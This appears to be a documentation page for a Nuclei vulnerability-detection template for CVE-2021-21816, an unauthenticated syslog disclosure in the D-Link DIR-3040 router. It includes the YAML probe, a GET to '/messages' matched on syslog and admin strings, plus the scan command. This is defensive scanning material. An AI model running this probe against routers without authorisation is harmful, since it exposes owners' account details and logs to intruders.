D-Link DIR-3040 1.13B03 - Information Disclosure
ID: CVE-2021-21816
Severity: medium
Author: gy741
Tags: cve2021,cve,dlink,exposure,router,syslog
Description
Section titled “Description”D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2021-21816
info: name: D-Link DIR-3040 1.13B03 - Information Disclosure author: gy741 severity: medium description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. impact: | An attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks. remediation: | Upgrade the router firmware to the latest version provided by D-Link. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 - https://nvd.nist.gov/vuln/detail/CVE-2021-21816 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2021-21816 cwe-id: CWE-200 epss-score: 0.00229 epss-percentile: 0.60334 cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: dir-3040_firmware tags: cve2021,cve,dlink,exposure,router,syslog
http: - method: GET path: - "{{BaseURL}}/messages"
matchers-condition: and matchers: - type: word part: body words: - "syslog:" - "admin" - "/etc_ro/lighttpd/www" condition: and
- type: status status: - 200# digest: 490a00463044022058240b356d7db1bfab75de695c3269fe48d8a4a919837c34cbd27575e0d13a3b022041470ce1d64941f9e5fc492bdb8512e8fb872ca373c0cdcb1e6823346cb584ba:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21816.yaml"